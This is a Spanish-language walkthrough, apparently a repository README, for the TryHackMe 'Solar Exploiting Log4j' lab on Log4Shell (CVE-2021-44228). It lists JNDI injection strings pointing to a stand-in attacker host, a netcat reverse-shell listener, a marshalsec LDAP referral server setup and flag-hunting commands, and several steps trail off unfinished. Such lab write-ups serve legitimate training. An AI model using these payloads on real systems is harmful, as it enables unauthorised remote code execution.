
Este repositorio proporciona una guía detallada de la sala *Solar Exploiting Log4j* en TryHackMe, centrada en explotar la vulnerabilidad crítica Log4Shell (CVE-2021-44228). El proyecto demuestra cómo los atacantes pueden aprovechar mecanismos de registro inseguros en aplicaciones Java para lograr la ejecución remota de código.
Plataforma: TryHackMe Dificultad: Media Tema: Log4Shell (Vulnerabilidad Log4j)
Explota la vulnerabilidad Log4j (CVE-2021-44228) para obtener ejecución remota de código y capturar flags.
nmap -sC -sV <TARGET_IP>
La vulnerabilidad Log4j permite la inyección JNDI:
${jndi:ldap://<ATTACKER_IP>:1389/a}
Si la entrada se registra → la vulnerabilidad existe.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
Ejecuta el servidor LDAP:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
Crea la clase Java maliciosa (Exploit.class)
Inyecta el payload en el campo vulnerable:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 Usa cabeceras como:
Una vez disparado:
Comprueba:
sudo -l
Busca:
find / -name flag.txt 2>/dev/null
cat flag.txt